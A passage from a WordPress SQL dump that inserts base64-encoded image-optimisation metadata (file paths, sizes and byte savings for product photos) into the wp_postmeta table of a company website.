YXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4OTA2LCJpZCI6OTc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTgwMHg2MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtODAweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC04MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODkwOSwiaWQiOjk3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC03Njh4NTc2LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTc2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTc2OHg1NzYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtNzY4eDU3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg5MTIsImlkIjo5NzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMTYwMHgxMjAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMTYwMHgxMjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTE2MDB4MTIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg5MTYsImlkIjo5NzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4OTE4LCJpZCI6OTc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODkyMSwiaWQiOjk3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg5MjMsImlkIjo5NzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4OTI2LCJpZCI6OTc1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4OTI4LCJpZCI6OTc1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4OTMwLCJpZCI6OTc1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4OTMzLCJpZCI6OTc1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4OTM1LCJpZCI6OTc1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4OTM4LCJpZCI6OTc1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29860, 974, 'wpfc_optimisation_reduction', '15905'); 
INSERT INTO `wp_postmeta` VALUES (29861, 974, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC5qcGciLCJ3aWR0aCI6NTc2MCwiaGVpZ2h0IjozODQwLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc4OTQzLCJpZCI6Ijk3NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1NjIsInRpbWUiOjE0ODM1Nzg5NDYsImlkIjo5NzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNTMxLCJ0aW1lIjoxNDgzNTc4OTUwLCJpZCI6OTc0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTQxMSwidGltZSI6MTQ4MzU3ODk1MywiaWQiOjk3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6Nzc3MiwidGltZSI6MTQ4MzU3ODk1OCwiaWQiOjk3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQyOCwidGltZSI6MTQ4MzU3ODk2MSwiaWQiOjk3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQxMiwidGltZSI6MTQ4MzU3ODk2NCwiaWQiOjk3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQzMCwidGltZSI6MTQ4MzU3ODk2OCwiaWQiOjk3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExMTQsInRpbWUiOjE0ODM1Nzg5NzEsImlkIjo5NzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjM5NywidGltZSI6MTQ4MzU3ODk3NSwiaWQiOjk3NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDAzLCJ0aW1lIjoxNDgzNTc4OTc4LCJpZCI6OTc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0NDksInRpbWUiOjE0ODM1Nzg5ODEsImlkIjo5NzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjQ2NywidGltZSI6MTQ4MzU3ODk4NSwiaWQiOjk3NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NTI5LCJ0aW1lIjoxNDgzNTc4OTg4LCJpZCI6OTc0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29862, 969, 'wpfc_optimisation_reduction', '1525080'); 
INSERT INTO `wp_postmeta` VALUES (29863, 969, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWVnLWdyZWFzZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1lZy1ncmVhc2UuanBnIiwid2lkdGgiOjI4NDgsImhlaWdodCI6Mjg0OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1lZy1ncmVhc2UuanBnIiwicmVkdWN0aW9uIjoxNTI1MDY3LCJ0aW1lIjoxNDgzNTc4OTk5LCJpZCI6Ijk2OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91c